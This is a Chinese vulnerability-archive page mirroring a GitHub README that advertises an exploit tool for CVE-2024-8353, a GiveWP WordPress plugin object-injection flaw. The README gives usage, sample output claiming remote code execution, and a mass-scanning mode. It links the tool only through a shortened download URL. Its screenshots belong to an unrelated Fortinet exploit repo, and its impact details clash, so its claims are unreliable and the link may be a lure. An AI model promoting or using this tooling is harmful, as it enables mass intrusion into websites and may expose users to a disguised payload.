漏洞平台

POC详情： 6b1fdb39e35c220c003ce52dc08b237e2372a9ff

来源

https://github.com/nothe1senberg/CVE-2024-8353

关联漏洞

标题： WordPress plugin GiveWP 代码问题漏洞 (CVE-2024-8353)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin GiveWP 3.16.1版本及之前版本存在代码问题漏洞，该漏洞源于PHP 对象注入。

介绍

## 🌟 Description
CVE-2024-8353
This vulnerability makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. 

## Details

- **CVE ID**: [CVE-2024-8353](https://nvd.nist.gov/vuln/detail/CVE-2024-8353)
- **Discovered**: 2024-09-27
- **Published**: 2024-09-28
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/qs4XT)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-8353
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-8353.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```


## 📈 CVSS Information
Score: 10

Severity: CRITICAL

Confidentiality: High

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low

![image](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE/assets/174053555/a5d4245a-f363-4eb2-a829-0316ab4e0d9d)
![image](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE/assets/174053555/88f234d8-9dc4-42cc-8b35-02a333ed2a7c)

文件快照


 [4.0K]  /data/pocs/6b1fdb39e35c220c003ce52dc08b237e2372a9ff
└── [2.3K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。